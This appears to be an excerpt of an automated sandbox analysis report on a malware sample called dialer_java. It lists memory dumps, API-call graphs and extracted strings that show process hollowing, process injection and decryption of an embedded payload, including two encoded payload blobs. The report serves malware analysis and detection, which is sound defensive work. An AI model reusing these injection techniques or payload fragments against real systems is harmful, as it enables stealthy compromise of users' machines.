                                      • Associated: 00000010.00000002.1914465385.00007FF6E3A89000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914493213.00007FF6E3A93000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914517226.00007FF6E3A94000.00000008.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914622587.00007FF6E3B8C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914647466.00007FF6E3B8F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914673975.00007FF6E3B93000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_16_2_7ff6e3a60000_dialer_java.jbxd
                                      Similarity
                                      • API ID: strerrorstrlen
                                      • String ID: (null)
                                      • API String ID: 960536887-3941151225
                                      • Opcode ID: f2373a739143e5c7c6886a2839f5784e2abfccd3a5dafc2859586661781da765
                                      • Instruction ID: d8bc595c9f424996b9c31b0d6a1a25d274f0737c54078518c7a15e03904b2332
                                      • Opcode Fuzzy Hash: f2373a739143e5c7c6886a2839f5784e2abfccd3a5dafc2859586661781da765
                                      • Instruction Fuzzy Hash: 22E04F13F0D18395E944E65D941B3FE6D5A9FC4390F9C4075D90EE2286EE2FF481414B
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000010.00000002.1914431606.00007FF6E3A61000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E3A60000, based on PE: true
                                      • Associated: 00000010.00000002.1914404633.00007FF6E3A60000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914465385.00007FF6E3A89000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914493213.00007FF6E3A93000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914517226.00007FF6E3A94000.00000008.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914622587.00007FF6E3B8C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914647466.00007FF6E3B8F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914673975.00007FF6E3B93000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_16_2_7ff6e3a60000_dialer_java.jbxd
                                      Similarity
                                      • API ID: strcmp
                                      • String ID:
                                      • API String ID: 1004003707-0
                                      • Opcode ID: 66c6bf3b211be3c92e68e951745e0b462fee0e45d65b69b835429f12a872f51f
                                      • Instruction ID: 85e487c6d34868f34e81558684a835a2155e949fa993cffd49df4362b26a6392
                                      • Opcode Fuzzy Hash: 66c6bf3b211be3c92e68e951745e0b462fee0e45d65b69b835429f12a872f51f
                                      • Instruction Fuzzy Hash: C4216877B2964282EAF18A0ED04523B7AE5FB00794F458431CF4D967E0DE3EF8C28646
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000010.00000002.1914431606.00007FF6E3A61000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E3A60000, based on PE: true
                                      • Associated: 00000010.00000002.1914404633.00007FF6E3A60000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914465385.00007FF6E3A89000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914493213.00007FF6E3A93000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914517226.00007FF6E3A94000.00000008.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914622587.00007FF6E3B8C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914647466.00007FF6E3B8F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914673975.00007FF6E3B93000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_16_2_7ff6e3a60000_dialer_java.jbxd
                                      Similarity
                                      • API ID: CriticalSection$EnterErrorLastLeaveValue
                                      • String ID:
                                      • API String ID: 682475483-0
                                      • Opcode ID: c3e10df1fb81cec98377597e4f843a6904a990f22e519dfd6c3b42c4d24bae7a
                                      • Instruction ID: 115c0735074a3cef13afa66ea1fd7f925ea7f7703a1d39c23ede9fb54814ce01
                                      • Opcode Fuzzy Hash: c3e10df1fb81cec98377597e4f843a6904a990f22e519dfd6c3b42c4d24bae7a
                                      • Instruction Fuzzy Hash: 0B01083BB19A02C5E6459B1AA9123747B20AF62B90F454031C90EF7690DF2FE8D5874A

                                      Execution Graph

                                      Execution Coverage:3%
                                      Dynamic/Decrypted Code Coverage:0%
                                      Signature Coverage:0%
                                      Total number of Nodes:228
                                      Total number of Limit Nodes:2
                                      execution_graph 13761 7ff6e3a61140 13764 7ff6e3a61160 13761->13764 13763 7ff6e3a61156 13765 7ff6e3a6118b 13764->13765 13766 7ff6e3a611b9 13764->13766 13765->13766 13767 7ff6e3a61190 13765->13767 13768 7ff6e3a611c7 _amsg_exit 13766->13768 13770 7ff6e3a611d3 13766->13770 13767->13766 13769 7ff6e3a611a0 Sleep 13767->13769 13768->13770 13769->13766 13769->13767 13771 7ff6e3a6121a 13770->13771 13772 7ff6e3a61201 _initterm 13770->13772 13789 7ff6e3a62410 13771->13789 13772->13771 13774 7ff6e3a61247 SetUnhandledExceptionFilter 13775 7ff6e3a6126a 13774->13775 13776 7ff6e3a6126f malloc 13775->13776 13777 7ff6e3a6128b 13776->13777 13780 7ff6e3a612d2 13776->13780 13778 7ff6e3a612a0 strlen malloc memcpy 13777->13778 13778->13778 13779 7ff6e3a612d0 13778->13779 13779->13780 13796 7ff6e3a83b80 13780->13796 13782 7ff6e3a61315 13783 7ff6e3a61344 13782->13783 13784 7ff6e3a61324 13782->13784 13787 7ff6e3a61160 106 API calls 13783->13787 13785 7ff6e3a6132d _cexit 13784->13785 13786 7ff6e3a61338 13784->13786 13785->13786 13786->13763 13788 7ff6e3a61366 13787->13788 13788->13763 13790 7ff6e3a62432 13789->13790 13793 7ff6e3a6259f 13789->13793 13791 7ff6e3a624e6 13790->13791 13792 7ff6e3a6252e 13790->13792 13790->13793 13791->13792 13975 7ff6e3a62730 13791->13975 13792->13793 13795 7ff6e3a62579 VirtualProtect 13792->13795 13793->13774 13795->13792 13798 7ff6e3a83b96 13796->13798 13797 7ff6e3a83c8c wcslen 13985 7ff6e3a6153f 13797->13985 13798->13797 13800 7ff6e3a83d18 13801 7ff6e3a61503 NtAllocateVirtualMemoryEx malloc 13800->13801 13938 7ff6e3a84264 13800->13938 13802 7ff6e3a83d43 13801->13802 13803 7ff6e3a83d8c 13802->13803 13804 7ff6e3a6156c NtAllocateVirtualMemoryEx malloc 13802->13804 13806 7ff6e3a83da6 memset wcscat memset 13803->13806 13805 7ff6e3a83d7c 13804->13805 13805->13803 13807 7ff6e3a6145e NtAllocateVirtualMemoryEx malloc 13805->13807 13808 7ff6e3a83dff 13806->13808 13807->13803 13809 7ff6e3a83e4f wcslen 13808->13809 13810 7ff6e3a83e6a 13809->13810 13814 7ff6e3a83ea8 13809->13814 13811 7ff6e3a83e80 _wcsnicmp 13810->13811 13812 7ff6e3a83e92 wcslen 13811->13812 13811->13814 13812->13811 13812->13814 13813 7ff6e3a83f16 wcscpy wcscat memset 13816 7ff6e3a83f55 13813->13816 13814->13813 13815 7ff6e3a8405d wcscpy wcscat 13817 7ff6e3a84088 memset 13815->13817 13821 7ff6e3a84161 13815->13821 13816->13815 13819 7ff6e3a840a9 13817->13819 13818 7ff6e3a8410c wcslen 13822 7ff6e3a84124 13818->13822 13825 7ff6e3a8415c 13818->13825 13819->13818 13820 7ff6e3a879b0 11 API calls 13820->13938 13821->13820 13823 7ff6e3a84130 _wcsnicmp 13822->13823 13824 7ff6e3a84146 wcslen 13823->13824 13823->13825 13824->13823 13824->13825 13826 7ff6e3a84355 wcscpy wcscat _wcsicmp 13825->13826 13827 7ff6e3a84389 13826->13827 13828 7ff6e3a843a2 memset 13826->13828 13829 7ff6e3a614d6 NtAllocateVirtualMemoryEx malloc 13827->13829 13830 7ff6e3a843c3 13828->13830 13829->13828 13831 7ff6e3a84408 wcscpy wcscat memset 13830->13831 13832 7ff6e3a8444e 13831->13832 13833 7ff6e3a844b1 wcscpy wcscat memset 13832->13833 13835 7ff6e3a844f7 13833->13835 13834 7ff6e3a84527 wcscpy wcscat memset 13837 7ff6e3a8456d 13834->13837 13835->13834 13836 7ff6e3a845dd wcscpy wcscat memset 13838 7ff6e3a84623 13836->13838 13837->13836 13839 7ff6e3a84668 wcscpy wcscat memset 13838->13839 13840 7ff6e3a846ae 13839->13840 13841 7ff6e3a846fe wcslen 13840->13841 13842 7ff6e3a84757 wcscat memset 13841->13842 13843 7ff6e3a84717 13841->13843 13847 7ff6e3a84792 13842->13847 13844 7ff6e3a84730 _wcsnicmp 13843->13844 13844->13842 13846 7ff6e3a84742 wcslen 13844->13846 13846->13842 13846->13844 13848 7ff6e3a847fe wcscpy wcscat 13847->13848 13849 7ff6e3a8617b memcpy 13848->13849 13850 7ff6e3a84830 13848->13850 13849->13850 13851 7ff6e3a879b0 11 API calls 13850->13851 13853 7ff6e3a849e3 13851->13853 13852 7ff6e3a879b0 11 API calls 13854 7ff6e3a84afb memset 13852->13854 13853->13852 13856 7ff6e3a84b1c 13854->13856 13855 7ff6e3a84b5f wcscpy wcscat 13857 7ff6e3a88410 6 API calls 13855->13857 13856->13855 13858 7ff6e3a84b8c 13857->13858 13859 7ff6e3a84c82 wcslen 13858->13859 13865 7ff6e3a84fc7 13858->13865 13860 7ff6e3a6157b NtAllocateVirtualMemoryEx malloc 13859->13860 13861 7ff6e3a84d08 13860->13861 13862 7ff6e3a84d41 13861->13862 13864 7ff6e3a6158a NtAllocateVirtualMemoryEx malloc 13861->13864 13863 7ff6e3a84e59 _wcsicmp 13862->13863 13867 7ff6e3a84de5 wcslen 13862->13867 13871 7ff6e3a879b0 11 API calls 13862->13871 13875 7ff6e3a87f20 11 API calls 13862->13875 13876 7ff6e3a614c7 NtAllocateVirtualMemoryEx malloc 13862->13876 13877 7ff6e3a8514e 13862->13877 13863->13862 13866 7ff6e3a84fa6 memset 13863->13866 13864->13862 13869 7ff6e3a85033 wcscpy wcscat 13865->13869 13872 7ff6e3a85092 memset wcscpy wcscat 13865->13872 13866->13865 13868 7ff6e3a615e4 NtAllocateVirtualMemoryEx malloc 13867->13868 13870 7ff6e3a84e4d 13868->13870 13869->13865 13873 7ff6e3a6145e NtAllocateVirtualMemoryEx malloc 13870->13873 13871->13866 13874 7ff6e3a87b30 NtAllocateVirtualMemoryEx malloc 13872->13874 13873->13863 13874->13862 13875->13862 13876->13862 13878 7ff6e3a879b0 11 API calls 13877->13878 13879 7ff6e3a8524e 13878->13879 13880 7ff6e3a88410 6 API calls 13879->13880 13881 7ff6e3a85256 _wcsicmp 13880->13881 13882 7ff6e3a85271 memset 13881->13882 13887 7ff6e3a8564b 13881->13887 13884 7ff6e3a85295 13882->13884 13883 7ff6e3a852da wcscpy wcscat wcslen 13885 7ff6e3a6146d NtAllocateVirtualMemoryEx malloc 13883->13885 13884->13883 13888 7ff6e3a853a3 13885->13888 13886 7ff6e3a83a80 10 API calls 13889 7ff6e3a85756 wcslen 13886->13889 13887->13886 13890 7ff6e3a61530 NtAllocateVirtualMemoryEx malloc 13888->13890 13891 7ff6e3a6153f NtAllocateVirtualMemoryEx malloc 13889->13891 13892 7ff6e3a853d9 13890->13892 13893 7ff6e3a857e1 13891->13893 13894 7ff6e3a86614 13892->13894 13895 7ff6e3a853e1 13892->13895 13896 7ff6e3a6145e NtAllocateVirtualMemoryEx malloc 13893->13896 13899 7ff6e3a6145e NtAllocateVirtualMemoryEx malloc 13894->13899 13897 7ff6e3a614a9 NtAllocateVirtualMemoryEx malloc 13895->13897 13898 7ff6e3a857f2 13896->13898 13901 7ff6e3a8542a 13897->13901 13902 7ff6e3a85803 13898->13902 13904 7ff6e3a8592a 13898->13904 13900 7ff6e3a86620 13899->13900 13900->13782 13903 7ff6e3a8547e 13901->13903 13908 7ff6e3a61440 NtAllocateVirtualMemoryEx malloc 13901->13908 13905 7ff6e3a83a80 10 API calls 13902->13905 13907 7ff6e3a6145e NtAllocateVirtualMemoryEx malloc 13903->13907 13906 7ff6e3a83a80 10 API calls 13904->13906 13909 7ff6e3a85816 13905->13909 13910 7ff6e3a8594b 13906->13910 13911 7ff6e3a85472 13907->13911 13912 7ff6e3a85462 13908->13912 13913 7ff6e3a83a80 10 API calls 13909->13913 13914 7ff6e3a87b30 NtAllocateVirtualMemoryEx malloc 13910->13914 13919 7ff6e3a87f20 11 API calls 13911->13919 13912->13903 13915 7ff6e3a85466 13912->13915 13917 7ff6e3a85822 memset 13913->13917 13918 7ff6e3a85961 13914->13918 13916 7ff6e3a6145e NtAllocateVirtualMemoryEx malloc 13915->13916 13916->13911 13920 7ff6e3a85843 13917->13920 13918->13909 13922 7ff6e3a83a80 10 API calls 13918->13922 13930 7ff6e3a8549b 13919->13930 13921 7ff6e3a85893 wcslen 13920->13921 13923 7ff6e3a858e8 wcscat 13921->13923 13924 7ff6e3a858a7 13921->13924 13925 7ff6e3a85987 13922->13925 13933 7ff6e3a6145e NtAllocateVirtualMemoryEx malloc 13923->13933 13926 7ff6e3a858c0 _wcsnicmp 13924->13926 13927 7ff6e3a87260 10 API calls 13925->13927 13926->13923 13931 7ff6e3a858d2 wcslen 13926->13931 13932 7ff6e3a859ac 13927->13932 13929 7ff6e3a879b0 11 API calls 13936 7ff6e3a85558 13929->13936 13930->13929 13931->13923 13931->13926 13934 7ff6e3a614a9 NtAllocateVirtualMemoryEx malloc 13932->13934 13946 7ff6e3a85c07 13932->13946 13933->13938 13937 7ff6e3a85a05 13934->13937 13935 7ff6e3a879b0 11 API calls 13935->13938 13936->13935 13940 7ff6e3a85c19 13937->13940 13941 7ff6e3a85a14 13937->13941 13938->13782 13939 7ff6e3a614c7 NtAllocateVirtualMemoryEx malloc 13942 7ff6e3a85c9f 13939->13942 13943 7ff6e3a615c6 NtAllocateVirtualMemoryEx malloc 13940->13943 13944 7ff6e3a614b8 NtAllocateVirtualMemoryEx malloc 13941->13944 13945 7ff6e3a83a80 10 API calls 13942->13945 13943->13946 13956 7ff6e3a85a38 13944->13956 13947 7ff6e3a85cb2 13945->13947 13946->13939 13949 7ff6e3a85cb8 13947->13949 13950 7ff6e3a85ce0 13947->13950 13948 7ff6e3a85b49 memset 13951 7ff6e3a6148b NtAllocateVirtualMemoryEx malloc 13948->13951 13954 7ff6e3a83a80 10 API calls 13949->13954 13952 7ff6e3a83a80 10 API calls 13950->13952 13955 7ff6e3a85b79 13951->13955 13952->13909 13953 7ff6e3a614b8 NtAllocateVirtualMemoryEx malloc 13953->13956 13957 7ff6e3a85cc7 13954->13957 13958 7ff6e3a85c29 13955->13958 13959 7ff6e3a85b81 13955->13959 13956->13948 13956->13953 13963 7ff6e3a615d5 NtAllocateVirtualMemoryEx malloc 13956->13963 13960 7ff6e3a6145e NtAllocateVirtualMemoryEx malloc 13957->13960 13961 7ff6e3a615c6 NtAllocateVirtualMemoryEx malloc 13958->13961 13962 7ff6e3a6149a NtAllocateVirtualMemoryEx malloc 13959->13962 13964 7ff6e3a85ccf 13960->13964 13961->13946 13965 7ff6e3a85bad 13962->13965 13963->13956 13966 7ff6e3a83a80 10 API calls 13964->13966 13967 7ff6e3a85c4e 13965->13967 13969 7ff6e3a614b8 NtAllocateVirtualMemoryEx malloc 13965->13969 13966->13909 13968 7ff6e3a615c6 NtAllocateVirtualMemoryEx malloc 13967->13968 13968->13946 13970 7ff6e3a85be9 13969->13970 13970->13967 13971 7ff6e3a85bed 13970->13971 13972 7ff6e3a6147c NtAllocateVirtualMemoryEx malloc 13971->13972 13973 7ff6e3a85bfb 13972->13973 13974 7ff6e3a6145e NtAllocateVirtualMemoryEx malloc 13973->13974 13974->13946 13978 7ff6e3a62752 13975->13978 13976 7ff6e3a62794 memcpy 13976->13791 13978->13976 13979 7ff6e3a627d5 VirtualQuery 13978->13979 13980 7ff6e3a62884 13978->13980 13979->13980 13984 7ff6e3a62802 13979->13984 13981 7ff6e3a628b3 GetLastError 13980->13981 13983 7ff6e3a628c7 13981->13983 13982 7ff6e3a62834 VirtualProtect 13982->13976 13982->13981 13984->13976 13984->13982 13989 7ff6e3a61394 13985->13989 13987 7ff6e3a6154e 13988 7ff6e3a61394 2 API calls 13987->13988 13993 7ff6e3a88680 13989->13993 13991 7ff6e3a613b8 13992 7ff6e3a613c6 NtAllocateVirtualMemoryEx 13991->13992 13992->13987 13994 7ff6e3a8869e 13993->13994 13997 7ff6e3a886cb 13993->13997 13994->13991 13995 7ff6e3a88773 13996 7ff6e3a8878f malloc 13995->13996 13998 7ff6e3a887b0 13996->13998 13997->13994 13997->13995 13998->13994
                                      APIs
                                      Strings
                                      • [INFO] Mutex not found: %s, xrefs: 00007FF6E3A85938
                                      • JzkdaHd1eXdoY3p5ZGJyaXJqZ3doaWx4LWt3cGtodXZqY2VodnV5d2xjenlkYnJpcmpnd2hpbHhta3dwE2h1dmR832Z2wXC6Tdt7NalDJgEbGUcHGgYLCgwGVxMKBhsZHkMHDVYHDBlMChRZIC0hSR8FAxJGTWx4PS53cA/ucnaJgucPdnV5d2xjenmUYlBpeWhpd2hXZXhtL3Vwa2h1dipyZWh2ZXl3bGN6OWVicmlyemd3aGtseGtrd3BraHV2bGNl, xrefs: 00007FF6E3A8594B
                                      • [SUCCESS] Payload decrypted, size: %zu bytes, xrefs: 00007FF6E3A85978
                                      • [INFO] Process handle closed, xrefs: 00007FF6E3A85CCF
                                      • [INFO] inject_process started, xrefs: 00007FF6E3A8574A
                                      • [INFO] Process hollowing executed for program: %s, xrefs: 00007FF6E3A85C9F
                                      • [INFO] Mutex already exists: %s, xrefs: 00007FF6E3A85803
                                      • [ERROR] Invalid process handle, xrefs: 00007FF6E3A85CE0
                                      • [ERROR] Failed to decrypt payload, xrefs: 00007FF6E3A85B3D
                                      • , xrefs: 00007FF6E3A85371
                                      • [INFO] inject_process completed, xrefs: 00007FF6E3A85816
                                      • [SUCCESS] Process handle obtained: 0x%p, xrefs: 00007FF6E3A85CB8
                                      • VlwdBRpVDxIeEBMWCl9QWFxaRVcNBw8XCQIZF1ZKICIsTlReVEpHemZfLhgXCVIfFxgUHgcHUVpcRURSSxAYGgQQWEoeAQ0HVkxVCgcKFwQTGUkaAQoeFx4EEQRFCxobRRQMBhIaDgRDUUpJUE1CW10HDgNHHQ0LBklJfWFIVUo+EQwPERALBFJucFlEQlJVMAUIAzwbBR8KDgVOZmJVVmNDRVQzGxgVAAYeRxAQBwxORSIZCQsAHQlVenpLSFVWVkwn, xrefs: 00007FF6E3A850E5
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.1953124589.00007FF6E3A61000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E3A60000, based on PE: true
                                      • Associated: 00000011.00000002.1953096686.00007FF6E3A60000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000011.00000002.1953199112.00007FF6E3A89000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000011.00000002.1953221114.00007FF6E3A93000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000011.00000002.1953331516.00007FF6E3B8F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000011.00000002.1953355533.00007FF6E3B93000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_17_2_7ff6e3a60000_dialer_java.jbxd
                                      Similarity
                                      • API ID: memset$wcscat$wcscpywcslen$_wcsnicmp$_wcsicmp$memcpy
                                      • String ID: $JzkdaHd1eXdoY3p5ZGJyaXJqZ3doaWx4LWt3cGtodXZqY2VodnV5d2xjenlkYnJpcmpnd2hpbHhta3dwE2h1dmR832Z2wXC6Tdt7NalDJgEbGUcHGgYLCgwGVxMKBhsZHkMHDVYHDBlMChRZIC0hSR8FAxJGTWx4PS53cA/ucnaJgucPdnV5d2xjenmUYlBpeWhpd2hXZXhtL3Vwa2h1dipyZWh2ZXl3bGN6OWVicmlyemd3aGtseGtrd3BraHV2bGNl$VlwdBRpVDxIeEBMWCl9QWFxaRVcNBw8XCQIZF1ZKICIsTlReVEpHemZfLhgXCVIfFxgUHgcHUVpcRURSSxAYGgQQWEoeAQ0HVkxVCgcKFwQTGUkaAQoeFx4EEQRFCxobRRQMBhIaDgRDUUpJUE1CW10HDgNHHQ0LBklJfWFIVUo+EQwPERALBFJucFlEQlJVMAUIAzwbBR8KDgVOZmJVVmNDRVQzGxgVAAYeRxAQBwxORSIZCQsAHQlVenpLSFVWVkwn$[ERROR] Failed to decrypt payload$[ERROR] Invalid process handle$[INFO] Mutex already exists: %s$[INFO] Mutex not found: %s$[INFO] Process handle closed$[INFO] Process hollowing executed for program: %s$[INFO] inject_process completed$[INFO] inject_process started$[SUCCESS] Payload decrypted, size: %zu bytes$[SUCCESS] Process handle obtained: 0x%p
                                      • API String ID: 1844779378-707888011
                                      • Opcode ID: 50f3b661096dc7b1e19b12610b6c206130408c8fe2271caf19ca8527248b59a1
                                      • Instruction ID: c24ce5848ccca302d3576c68685f2062b126ceb92425a49d9cb2ef41ec15f2f9
                                      • Opcode Fuzzy Hash: 50f3b661096dc7b1e19b12610b6c206130408c8fe2271caf19ca8527248b59a1
                                      • Instruction Fuzzy Hash: 45335053D2C7C384F7119B2CA8477F47BA0AFA6344F44523AD98DF65A1EF6E6184830A

                                      Control-flow Graph

                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.1953124589.00007FF6E3A61000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E3A60000, based on PE: true
                                      • Associated: 00000011.00000002.1953096686.00007FF6E3A60000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000011.00000002.1953199112.00007FF6E3A89000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000011.00000002.1953221114.00007FF6E3A93000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000011.00000002.1953331516.00007FF6E3B8F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000011.00000002.1953355533.00007FF6E3B93000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_17_2_7ff6e3a60000_dialer_java.jbxd
                                      Similarity
                                      • API ID: malloc$ExceptionFilterSleepUnhandled_amsg_exit_cexit_inittermmemcpystrlen
                                      • String ID:
                                      • API String ID: 2643109117-0
                                      • Opcode ID: db9654a873d05972df7c4cd3774028c37a5ca561359b6cfc46425ec131679173
                                      • Instruction ID: ad52f5a23d23c214c2b6e8cc16b8d576ba23f7326ab75b7bd45e7d6b8c5d5049
                                      • Opcode Fuzzy Hash: db9654a873d05972df7c4cd3774028c37a5ca561359b6cfc46425ec131679173
                                      • Instruction Fuzzy Hash: 62515E73F1964781F6109B2DE95A3793FA4BF95B80F004435C94EE73A1DE2EA4C1874A

                                      Control-flow Graph

                                      APIs
                                      • NtAllocateVirtualMemoryEx.NTDLL(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6E3A61156), ref: 00007FF6E3A613F7
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.1953124589.00007FF6E3A61000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E3A60000, based on PE: true
                                      • Associated: 00000011.00000002.1953096686.00007FF6E3A60000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000011.00000002.1953199112.00007FF6E3A89000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000011.00000002.1953221114.00007FF6E3A93000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000011.00000002.1953331516.00007FF6E3B8F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000011.00000002.1953355533.00007FF6E3B93000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_17_2_7ff6e3a60000_dialer_java.jbxd
                                      Similarity
                                      • API ID: AllocateMemoryVirtual
                                      • String ID:
                                      • API String ID: 2167126740-0
                                      • Opcode ID: 27820dc2d2f6668a26f19431ae4115d453894afd47fcb02c8a0a545cebde311c
                                      • Instruction ID: 3744e0ce1cc0dc6cade55385d7258ac9443734480f345688f3513dbbbcac966b
                                      • Opcode Fuzzy Hash: 27820dc2d2f6668a26f19431ae4115d453894afd47fcb02c8a0a545cebde311c
                                      • Instruction Fuzzy Hash: 79F0C976A0CB4182D610CF59F84222A7B74FB48380B015835EACDA7765CF3EE0A0CB49

                                      Control-flow Graph

                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.1953124589.00007FF6E3A61000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E3A60000, based on PE: true
                                      • Associated: 00000011.00000002.1953096686.00007FF6E3A60000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000011.00000002.1953199112.00007FF6E3A89000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000011.00000002.1953221114.00007FF6E3A93000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000011.00000002.1953331516.00007FF6E3B8F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000011.00000002.1953355533.00007FF6E3B93000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_17_2_7ff6e3a60000_dialer_java.jbxd
                                      Similarity
                                      • API ID: _localtime64_s_time64
                                      • String ID: %s $[%Y-%m-%d %H:%M:%S]
                                      • API String ID: 2262455995-899559958
                                      • Opcode ID: a058c66051b2317f5e588f79f743636c4437f49c9a2c9167b86e4ef29b80d505
                                      • Instruction ID: fb622665a8dbf02292f0cf30bcfd6cd6757687318b7233245df5be1ec58096bd
                                      • Opcode Fuzzy Hash: a058c66051b2317f5e588f79f743636c4437f49c9a2c9167b86e4ef29b80d505
                                      • Instruction Fuzzy Hash: 6E01A132718B8250E6109B18F8563FA6764EF887D0F400031E98E637949E3DD189C705

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 1038 7ff6e3a76520-7ff6e3a76539 1039 7ff6e3a7653b-7ff6e3a76542 1038->1039 1040 7ff6e3a76549-7ff6e3a7655a 1038->1040 1039->1040 1041 7ff6e3a7655c 1040->1041 1042 7ff6e3a76575-7ff6e3a7657e 1040->1042 1043 7ff6e3a7655e-7ff6e3a76574 1041->1043 1044 7ff6e3a765dc-7ff6e3a765e6 1042->1044 1045 7ff6e3a76580-7ff6e3a76589 1042->1045 1044->1041 1046 7ff6e3a765ec-7ff6e3a765f8 1044->1046 1047 7ff6e3a76640-7ff6e3a766bf 1045->1047 1048 7ff6e3a7658f-7ff6e3a76598 1045->1048 1050 7ff6e3a766f9-7ff6e3a76701 1046->1050 1051 7ff6e3a765fe-7ff6e3a76608 1046->1051 1052 7ff6e3a7688a-7ff6e3a768b6 1047->1052 1053 7ff6e3a766c5-7ff6e3a766d3 1047->1053 1048->1041 1049 7ff6e3a7659a-7ff6e3a765a4 1048->1049 1049->1041 1056 7ff6e3a765a6-7ff6e3a765af 1049->1056 1050->1041 1057 7ff6e3a76707-7ff6e3a7670a 1050->1057 1060 7ff6e3a76610-7ff6e3a76619 1051->1060 1058 7ff6e3a768bc-7ff6e3a768c9 1052->1058 1059 7ff6e3a769c6-7ff6e3a769e5 call 7ff6e3a6d9a0 1052->1059 1054 7ff6e3a76849-7ff6e3a76854 malloc 1053->1054 1055 7ff6e3a766d9-7ff6e3a766ee realloc 1053->1055 1070 7ff6e3a7685a-7ff6e3a76860 1054->1070 1071 7ff6e3a76c67 call 7ff6e3a62d30 1054->1071 1061 7ff6e3a76877-7ff6e3a76883 1055->1061 1062 7ff6e3a766f4 1055->1062 1063 7ff6e3a765b5-7ff6e3a765b7 1056->1063 1064 7ff6e3a767a0-7ff6e3a767a3 1056->1064 1057->1041 1065 7ff6e3a76710-7ff6e3a7672e 1057->1065 1066 7ff6e3a76925-7ff6e3a76928 1058->1066 1089 7ff6e3a76a06-7ff6e3a76a14 1059->1089 1090 7ff6e3a769e7-7ff6e3a769f5 1059->1090 1068 7ff6e3a7661b-7ff6e3a76627 1060->1068 1069 7ff6e3a7662f-7ff6e3a76635 1060->1069 1061->1052 1062->1071 1074 7ff6e3a765c0-7ff6e3a765c9 1063->1074 1064->1041 1078 7ff6e3a767a9-7ff6e3a767ac 1064->1078 1075 7ff6e3a7675a-7ff6e3a7679b 1065->1075 1076 7ff6e3a76730-7ff6e3a7673d malloc 1065->1076 1066->1059 1079 7ff6e3a7692e-7ff6e3a76932 1066->1079 1068->1060 1081 7ff6e3a76629-7ff6e3a7662c 1068->1081 1069->1057 1082 7ff6e3a7663b 1069->1082 1072 7ff6e3a76862-7ff6e3a7686b memcpy 1070->1072 1073 7ff6e3a76870 1070->1073 1085 7ff6e3a76c6c-7ff6e3a76c80 _assert 1071->1085 1072->1073 1073->1061 1074->1064 1083 7ff6e3a765cf-7ff6e3a765d8 1074->1083 1075->1043 1076->1071 1084 7ff6e3a76743-7ff6e3a76757 1076->1084 1078->1041 1086 7ff6e3a767b2-7ff6e3a767d0 1078->1086 1087 7ff6e3a76934-7ff6e3a76938 1079->1087 1088 